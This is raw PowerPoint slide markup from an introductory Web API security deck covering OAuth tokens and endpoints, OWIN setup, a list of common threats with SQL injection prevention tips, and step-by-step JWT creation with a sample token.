              <a:t>Provides a way to grant limited access in terms of scope and duration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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Has support from big players in the industry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Blocks of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OAuth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4682852"/>
            <a:ext cx="6912768" cy="46064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0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24112" y="1104900"/>
            <a:ext cx="5895975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Threats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666750"/>
            <a:ext cx="6912768" cy="460648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Type of security Threats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676400" y="1123950"/>
            <a:ext cx="7391400" cy="388620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SQL Injection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XSS (Cross site scripting)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CSRF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Broken Authentication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Sensitive Data Exposure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Broken Access Control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Parameter Tampering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Man-In-The-Middle-Attack (MITM)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050005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Oauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Tokens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4682852"/>
            <a:ext cx="6912768" cy="4606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76400" y="666750"/>
            <a:ext cx="7315200" cy="3810000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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 err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> protocol supports bearer tokens. Once authorized, using bearer token client can request to access resource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b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is Bearer Token?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A security token is something that any party in possession of the token (a "bearer") can use to present proof-of-possession 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Protocol defines two types of tokens used in the process </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Access Token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These are credentials required to access the protected resources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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Refresh Token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Refresh tokens are credentials used to obtain access tokens when it becomes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invalid or expires etc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Oauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Tokens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4682852"/>
            <a:ext cx="6912768" cy="4606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524000" y="666750"/>
            <a:ext cx="7620000" cy="3810000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>What is Access Token ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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Access Token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is a credential that can be used by an application to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access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an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 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Access Tokens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can be either an opaque string or a JSON web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token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They inform the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that the bearer of the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token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has been authorized to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access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the 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API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perform specific actions specified by the scope that has been granted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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Oauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Grant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4682852"/>
            <a:ext cx="6912768" cy="4606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76400" y="666750"/>
            <a:ext cx="7315200" cy="3810000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Grant is a credential which represents owner’s authorization and used by client to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access owner’s protected resources.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" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The 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grant_type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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL parameter is required for the /token endpoint, which exchanges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a grant for real tokens. So the OAuth2 server knows what you are sending to it.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so you must specify it with the value password.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" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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grant_type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=password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>means that you are sending a username and a password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 to the /token endpoint.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Oauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – End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4682852"/>
            <a:ext cx="6912768" cy="4606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76400" y="666750"/>
            <a:ext cx="7315200" cy="3810000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Endpoints are the URIs which Client uses to make requests. Protocol supports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following authorization server endpoints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b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authorization Endpoint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Endpoint used by client to obtain resource authorization from resource owner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b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Token Endpoint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Used by client to retrieve access or refresh token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b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Redirection Endpoint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Authorization server uses the endpoint to redirect after authorization process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Oauth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666750"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A real life example</a:t>
            </a:r>
          </a:p>
          <a:p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0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562600" y="209550"/>
            <a:ext cx="3388995" cy="3263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1524000" y="3486150"/>
            <a:ext cx="7620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After you provide to Twitter your username and password, </a:t>
            </a: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The browser will redirect you back to LinkedIn, that now, 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without knowing any </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   Twitter credential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, can do something on Twitter.</a:t>
            </a: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You just delegated LinkedIn to operate on Twitter.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0" y="1352550"/>
            <a:ext cx="40386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The Twitter popup window  tells you in advance </a:t>
            </a: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what LinkedIn will be able to do with these </a:t>
            </a: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authorization grant </a:t>
            </a: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(this list of permissions is the SCOPE).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1" name="Left Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="2114550"/>
            <a:ext cx="990600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OWIN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What is OWIN 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76400" y="1664245"/>
            <a:ext cx="7315200" cy="2995737"/>
          </a:xfrm>
        </p:spPr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Open Web Interface for.NET (OWIN) is an open-source specification that describes an abstraction layer between web servers and application components. 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It defines a standard interface between .NET web servers and web applications. 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The primary goal of OWIN is to decouple the server and application, encouraging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development of small and focused application.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OWIN security middleware is developed to implement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OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Protocol </a:t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791076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Components/Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="owner-resource-authentication-flow.jpg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1676400" y="1504950"/>
            <a:ext cx="6937439" cy="2324100"/>
          </a:xfr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819150"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Components/Architecture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524000" y="1428750"/>
            <a:ext cx="7467600" cy="3269705"/>
          </a:xfrm>
        </p:spPr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The following are the principal components of this authentication mode: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b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Resource server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It holds the resource and protects the resource from unauthorized access.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/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r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Resource owner:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> It requests the resource base on needs.</a:t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b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authorization server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A server that authenticates the resource owner identity and issues the access token to the client.</a:t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b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> It is an application that requests access on a resource on behalf of the resource owner.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OWIN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666750"/>
            <a:ext cx="6912768" cy="46064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0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14600" y="895350"/>
            <a:ext cx="5629275" cy="378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0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667000" y="742950"/>
            <a:ext cx="5783580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threats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666750"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Injection attacks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524000" y="1352550"/>
            <a:ext cx="7522368" cy="335280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SQL injection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SQL injection is a code injection technique that might destroy your database.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Effective way to stop an injection attack :-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Input validation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Validate input: length / range / format and type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Achieve an implicit input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parameters validation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by using strong types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Constrain string inputs with regex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Define an appropriate request size limit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="31535135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0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667000" y="742950"/>
            <a:ext cx="5703570" cy="4120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0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38400" y="819150"/>
            <a:ext cx="5737860" cy="4177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666750"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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E.g.:- Step-1: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Add OWIN Start Up class. [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Startup.Auth.cs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0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76400" y="971550"/>
            <a:ext cx="57912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3983261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666750"/>
            <a:ext cx="7391400" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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E.g.:-Step-2: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Add a class for validating user credentials asking for tokens.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0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76400" y="971550"/>
            <a:ext cx="7039008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3983261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742950"/>
            <a:ext cx="6912768" cy="460648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E.g.:-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676400" y="1123950"/>
            <a:ext cx="7391400" cy="38862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vgarg\Desktop\WEB API SECURITY\OWIN err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67000" y="666750"/>
            <a:ext cx="6013210" cy="1268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vgarg\Desktop\WEB API SECURITY\OWIN succe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880540"/>
            <a:ext cx="6076656" cy="1910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vgarg\Desktop\WEB API SECURITY\OWIN success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028950"/>
            <a:ext cx="4860308" cy="1990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4564455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666750"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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524000" y="1123950"/>
            <a:ext cx="7543800" cy="3962400"/>
          </a:xfrm>
        </p:spPr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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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983261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JWT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971550"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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What is JWT?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524000" y="1428750"/>
            <a:ext cx="7620000" cy="3581400"/>
          </a:xfrm>
        </p:spPr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A JSON Web Token (JWT) is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>JSON object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that is a safe way to represent a set of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information between two parties. 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Powerful token format used in HTTP headers in order to make some endpoint secure.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Its an Open standard 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The token is composed of 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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a header,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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a payload, and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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a signature.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Simply put, a JWT is just a string with the following format:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="4476750"/>
            <a:ext cx="3200400" cy="304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header.payload.signature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JWT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666750"/>
            <a:ext cx="6912768" cy="460648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Why it is used?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600200" y="1047750"/>
            <a:ext cx="7543800" cy="388620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Securely transfer information between any two bodies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Digitally signed – information is verified and trusted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Compact –  JWT can be send via URL,POST request,HTTP header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Fast transaction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Self contained  – Contains info about the user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Avoiding query the database more than once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895052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JWT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742950"/>
            <a:ext cx="6912768" cy="460648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JWT Structure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676400" y="1200150"/>
            <a:ext cx="7315200" cy="373380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Header :-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alg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  algorithm like HMAC SHA256 or RSA []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Typ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  type of JWT token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Payload :-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contains claims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claims are user details or additional metadata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Signature:-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Provide more security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05000" y="1352550"/>
            <a:ext cx="3200400" cy="304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header.payload.signature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7472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JWT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742950"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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What is JWT?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5124" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="10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76398" y="1123948"/>
            <a:ext cx="6329363" cy="347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1676400" y="4629150"/>
            <a:ext cx="3200400" cy="304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header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>signature</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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threats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666750"/>
            <a:ext cx="6912768" cy="460648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SQL Injection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57800" y="438150"/>
            <a:ext cx="3777190" cy="2391109"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\vgarg\Desktop\WEB API SECURITY\shivam\sqlinjection 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724150"/>
            <a:ext cx="4267200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524000" y="1100465"/>
            <a:ext cx="37338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What?</a:t>
            </a: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Malicious SQL code for backend  DB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Hackers enter various SQL commands in the form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5934075" y="2952750"/>
            <a:ext cx="33528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Prevention :-</a:t>
            </a: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Use Stored Procedures. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="22070298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JWT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742950"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Flow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="2017-10-16-19-52-32.png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3276600" y="0"/>
            <a:ext cx="5867400" cy="3867150"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3390900"/>
            <a:ext cx="76200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Ø"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It relies on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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signed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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tokens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 which are sent by user to server with each request. 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you put all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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claims in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400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json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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web structure.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you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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sign structure using asymmetric key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and encode whole thing in Base64.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validating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signature,issuer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and audience </a:t>
            </a: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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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JWT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742950"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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 Steps :- </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="JWT.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="10"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752599" y="1276348"/>
            <a:ext cx="5029200" cy="3457575"/>
          </a:xfr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JWT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742950"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Steps to create JWT?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524000" y="1200150"/>
            <a:ext cx="7620000" cy="2995737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Step 1. Create the HEADER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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The header is a JSON object in the following format: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b="1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81200" y="2495550"/>
            <a:ext cx="2362200" cy="1219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{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>typ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>": "JWT",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>": "HS256" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}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581400" y="2876550"/>
            <a:ext cx="16764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334000" y="2495550"/>
            <a:ext cx="2286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is a JWT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3657600" y="3257550"/>
            <a:ext cx="16764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410200" y="3105150"/>
            <a:ext cx="2286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hashing algorithm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JWT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742950"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Steps to create JWT?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524000" y="1200150"/>
            <a:ext cx="7620000" cy="3276600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Step 2. Create the PAYLOAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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The payload component of the JWT is the data that‘s stored inside the JWT </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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This data is also referred to as the “claims” of the JWT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There are several different standard claims for the JWT payload, such as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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> “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iss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” the issuer,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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> “sub” the subject, and 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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  “exp” the expiration time. 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Keep in mind that the size of the data will affect the overall size of the JWT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="2343150"/>
            <a:ext cx="6172200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{ "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>": "b08f86af-35da-48f2-8fab-cef3904660bd"}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JWT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742950"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Steps to create JWT?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524000" y="1200150"/>
            <a:ext cx="7620000" cy="3276600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Step 3. Create the SIGNATURE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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The signature is computed using the following pseudo code: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b="1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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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81200" y="3181350"/>
            <a:ext cx="6172200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xN_h82PHVTCMA9vdoHrcZxH-x5mb11y1537t3rGzcM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2266950"/>
            <a:ext cx="61722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HMACSHA256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hmac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new HMACSHA256();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string key = Convert.ToBase64String(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hmac.Key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);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905000" y="3867150"/>
            <a:ext cx="6172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Algorithm :- SecurityAlgorithms.HmacSha256Signature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JWT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742950"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Steps to create JWT?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524000" y="1200150"/>
            <a:ext cx="7620000" cy="3276600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Step 4. Put All Three JWT Components Together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Now that we have created all three components, we can create the JWT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>header.payload.signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> structure of the JWT, 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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>we simply need to combine the components, with periods (.) separating them.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05000" y="2724150"/>
            <a:ext cx="6400800" cy="1295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// JWT Token</a:t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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VySWQiOiJiMDhmODZhZi0zNWRhLTQ4ZjItOGZhYi1jZWYzOTA0NjYwYmQifQ.-xN_h82PHVTCMA9vdoHrcZxH-x5mb11y1537t3rGzcM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JWT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742950"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Steps to create JWT?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524000" y="1200150"/>
            <a:ext cx="7620000" cy="3276600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Step 5. Verifying the JWT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JWT-attached API call to the application, can be validated.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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It matches the JWT signature created by the authentication server.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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If the signatures match, then that means the JWT is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> otherwise 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invalid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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
